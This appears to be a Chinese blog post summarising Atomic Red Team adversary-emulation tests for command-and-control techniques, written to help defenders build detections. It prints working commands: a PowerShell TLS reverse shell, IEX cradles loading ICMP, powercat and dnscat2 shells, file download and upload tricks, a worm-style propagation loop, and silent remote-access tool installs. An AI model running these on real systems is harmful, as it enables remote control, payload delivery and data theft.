标签：exe 战术 Windows 命令 Atomic https Test com

Atomic-命令与控制战术

• 可以编入使用落实到安全策略且有效的战术编号
• 参考：
• https://atomicredteam.io/atomics/#command-and-control

具体战术概览

command-and-control
T1573
Encrypted Channel    加密通道

T1572
Protocol Tunneling   协议隧道

T1571
Non-Standard Port    非标准端口

T1219
Remote Access Software   远程访问软件

T1132.001
Data Encoding: Standard Encoding   数据编码：标准编码

T1105
Ingress Tool Transfer              入口工具传输

T1095
Non-Application Layer Protocol      非应用层协议

T1090.003
Proxy: Multi-hop Proxy              代理：多跳代理

T1090.001
Proxy: Internal Proxy               代理：内部代理

T1071.004
Application Layer Protocol: DNS     应用层协议：DNS

T1071.001
Application Layer Protocol: Web Protocols   应用层协议：Web协议

主机模型-加密通道

1. 使用 Openssl 建立 C2

C2 : Command and Control (C2)

$server_ip = 127.0.0.1
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"

https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
https://gist.githubusercontent.com/clr2of8/4786587885a7debc576ab44a32fa5cb7/raw/af5827f3169920035da73bc17bc5ec8465b41c59/c2_client_to_openssl_server.ps1

---

主机模型-协议隧道

• Atomic Test #1 - DNS over HTTPS Large Query Volume

• Atomic Test #2 - DNS over HTTPS Regular Beaconing

• Atomic Test #3 - DNS over HTTPS Long Domain Query

1. 通过DNS over HTTPS 进行大量查询

for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \""https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=TXT\"" -UseBasicParsing).Content 

2. 通过 DNS over HTTPS 进行常规信标

常规信标：该测试模拟受感染的主机通过 DoH 查询向命令和控制服务器定期发送信标。这种行为对于处于空闲状态等待指令或配置为随着时间的推移使用低查询量来逃避基于阈值的检测的植入物来说是典型的。

Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30

3. 通过 DNS over HTTPS 进行长域名查询

Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT

---

主机模型-非标准端口

• Atomic Test #1 - Testing usage of uncommonly used port with PowerShell

• Atomic Test #2 - Testing usage of uncommonly used port

1. 使用 Powershell 测试非标准端口使用情况

Test-NetConnection -ComputerName google.com -port 8081 

2. 使用 telnet 测试非标准端口使用情况

echo quit | telnet google.com 8081
exit 0

---

主机模型-远程访问软件

• Atomic Test #1 - TeamViewer Files Detected Test on Windows

• Atomic Test #2 - AnyDesk Files Detected Test on Windows

• Atomic Test #3 - LogMeIn Files Detected Test on Windows

• Atomic Test #4 - GoToAssist Files Detected Test on Windows

• Atomic Test #5 - ScreenConnect Application Download and Install on Windows

• Atomic Test #6 - Ammyy Admin Software Execution

• Atomic Test #7 - RemotePC Software Execution

• Atomic Test #8 - NetSupport - RAT Execution

• Atomic Test #9 - UltraViewer - RAT Execution

• Atomic Test #10 - UltraVNC Execution

• Atomic Test #11 - MSP360 Connect Execution

1. 在 Windows 上检测 TeamViewer 软件

Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe"
Start-Process -Wait $file1 /S; 
Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'

2. 在 Windows 上检测 Anydesk 软件

Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe"
Start-Process $file1 /S;

3. 在 Windows 上检测 LogMeIn 软件

Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
$file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi"
Start-Process -Wait $file1 /quiet;
Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' "/S"

4. 在 Windows 上安装 GoToAssist 软件

"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4

5. 在 Windows 上安装 ScreenConnect 软件

$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
msiexec /i $installer /qn

6. 在 Windows 上安装 Ammyy Admin 软件

Start-Process $env:temp\ammyy.exe

7. 在 Windows 上安装 RemotePC 软件

Start-Process $env:temp\RemotePC.exe

8. 在 Windows 上安装 NetSupport 远程访问木马（RAT）软件

Start-Process $env:temp\T1219_NetSupport.exe -ArgumentList "/S /v/qn"

9. 在 Windows 上安装 UltraViewer 软件

Start-Process -Wait -FilePath "$env:temp\T1219_UltraViewer.exe" -Argument "/silent" -PassThru
Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'

10. 在 Windows 上安装 UltraVNC 软件

Start-Process $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe'

11. 在 Windows 上安装 MSP360 软件

Start-Process $env:ProgramFiles\Connect\Connect.exe

---

主机模型-数据编码-标准编码

• Atomic Test #1 - Base64 Encoded data.

• Atomic Test #2 - XOR Encoded data.

1. 使用 Base64 编码数据

echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com

2. 使用 XOR 编码数据

$plaintext = ([system.Text.Encoding]::UTF8.getBytes(\""Path\n----\nC:\Users\victim\"")) $key = \""abcdefghijklmnopqrstuvwxyz123456\"" $cyphertext = @(); for ($i = 0; $i -lt $plaintext.Count; $i++) { $cyphertext += $plaintext[$i] -bxor $key[$i %% $key.Length]; } $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext) [System.Net.ServicePointManager]::Expect100Continue = $false Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive

---

主机模型-入口工具传输

• Atomic Test #1 - rsync remote file copy (push)

• Atomic Test #2 - rsync remote file copy (pull)

• Atomic Test #3 - scp remote file copy (push)

• Atomic Test #4 - scp remote file copy (pull)

• Atomic Test #5 - sftp remote file copy (push)

• Atomic Test #6 - sftp remote file copy (pull)

• Atomic Test #7 - certutil download (urlcache)

• Atomic Test #8 - certutil download (verifyctl)

• Atomic Test #9 - Windows - BITSAdmin BITS Download

• Atomic Test #10 - Windows - PowerShell Download

• Atomic Test #11 - OSTAP Worming Activity

• Atomic Test #12 - svchost writing a file to a UNC path

• Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe

• Atomic Test #14 - whois file download

• Atomic Test #15 - File Download via PowerShell

• Atomic Test #16 - File download with finger.exe on Windows

• Atomic Test #17 - Download a file with IMEWDBLD.exe

• Atomic Test #18 - Curl Download File

• Atomic Test #19 - Curl Upload File

• Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download

• Atomic Test #21 - MAZE Propagation Script

• Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file

• Atomic Test #23 - Lolbas replace.exe use to copy file

• Atomic Test #24 - Lolbas replace.exe use to copy UNC file

• Atomic Test #25 - certreq download

• Atomic Test #26 - Download a file using wscript

• Atomic Test #27 - Linux Download File and Run

• Atomic Test #28 - Nimgrab - Transfer Files

• Atomic Test #29 - iwr or Invoke Web-Request download

入口工具传输：可以理解为恶意攻击者想将一些带上传，下载，复制，移动，反弹功能的各种类似工具传入到目标受害的主机上，以达到进入目标主机的入口所使用的工具，我们成为入口工具传输。

具体测试用例看下面链接：
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md

提取常用的入口工具特征

rsync scp sftp 

(certutil -urlcache) 

(certutil -verifyctl) 

(bitsadmin.exe /transfer)

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}

timeout --preserve-status 1 whois -h localhost -p 443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out

(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}

finger base64_filedata@#{remote_host}

$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}

下载
curl -k url -o c:\users\public\music\allthethingsx64.dll
curl -k url --output c:\users\public\music\allthethingsx64.dll
curl -k url -o c:\programdata\allthethingsx64.dll
curl -k url -o %Temp%\allthethingsx64.dll

上传
curl -T c:\temp\atomictestfile.txt www.example.com
curl --upload-file c:\temp\atomictestfile.txt www.example.com
curl -d c:\temp\atomictestfile.txt www.example.com
curl --data c:\temp\atomictestfile.txt www.example.com

https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat

$machine_list = "$env:temp\T1105MachineList.txt"
$offline_list = "$env:temp\T1105OfflineHosts.txt"
$completed_list = "$env:temp\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet) 
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}

replace.exe

certreq.exe -Post -config https://example.com c:\windows\win.ini %temp%\Atomic-license.txt

wscript.exe PathToAtomicsFolder\T1105\src\T1105-download-file.vbs

curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh; chmod +x atomic.sh
 | bash atomic.sh

nimgrab.exe

powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile %temp%\Atomic-license.txt

---

主机模型-非应用层协议

• Atomic Test #1 - ICMP C2

• Atomic Test #2 - Netcat C2

• Atomic Test #3 - Powercat C2

1. ICMP C2

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress 127.0.0.1

2. Netcat C2

cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80

3. Powercat C2

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c 127.0.0.1 -p 80

主机模型-代理-多跳代理

• Atomic Test #1 - Psiphon

• Atomic Test #2 - Tor Proxy Usage - Windows

• Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu

• Atomic Test #4 - Tor Proxy Usage - MacOS

1. Psiphon

PathToAtomicsFolder\T1090.003\src\Psiphon.bat

特征：psiphon3.exe

https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat

2. Tor Proxy Usage - Windows

invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'
sleep -s 60
stop-process -name "tor" | out-null

https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip

3. Tor Proxy Usage - Debian/Ubuntu

sudo systemctl start tor

sudo apt-get -y install tor

4. Tor Proxy Usage - MacOS

osascript -e 'tell application "Terminal" to do script "tor"'

if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor

---

主机模型-代理-内部代理

• Atomic Test #1 - Connection Proxy

• Atomic Test #2 - Connection Proxy for macOS UI

• Atomic Test #3 - portproxy reg key

1. Connection Proxy

export http_proxy=127.0.0.1:8080

unset http_proxy
unset https_proxy

2. Connection Proxy for macOS UI

networksetup -setwebproxy Wi-Fi 127.0.0.1 8080
networksetup -setsecurewebproxy Wi-Fi 127.0.0.1 8080

networksetup -setwebproxystate Wi-Fi off
networksetup -setsecurewebproxystate Wi-Fi off

3. portproxy reg key

netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1

netsh interface portproxy delete v4tov4 listenport=1337 -ErrorAction Ignore | Out-Null

---

主机模型-应用层协议-DNS

• Atomic Test #1 - DNS Large Query Volume

• Atomic Test #2 - DNS Regular Beaconing

• Atomic Test #3 - DNS Long Domain Query

• Atomic Test #4 - DNS C2

1. 大量的 DNS 查询

for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type \""TXT\"" \""atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\"" -QuickTimeout}

2. DNS 常规信标

Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30

3. DNS 长域名查询

Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT

4. DNS C2

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1

---

主机模型-应用层协议-Web 协议

• Atomic Test #1 - Malicious User Agents - Powershell

• Atomic Test #2 - Malicious User Agents - CMD

• Atomic Test #3 - Malicious User Agents - Nix

1. 使用 Powershell 执行恶意的User-Agent

Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null

2. 使用 CMD 执行恶意的User-Agent

curl -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1
curl -s -A "*<|>*" -m3 www.google.com >nul 2>&1

3. Linux 环境下执行恶意的User-Agent

curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com

标签：exe,战术,Windows,命令,Atomic,https,Test,com
From： https://www.cnblogs.com/autopwn/p/17466620.html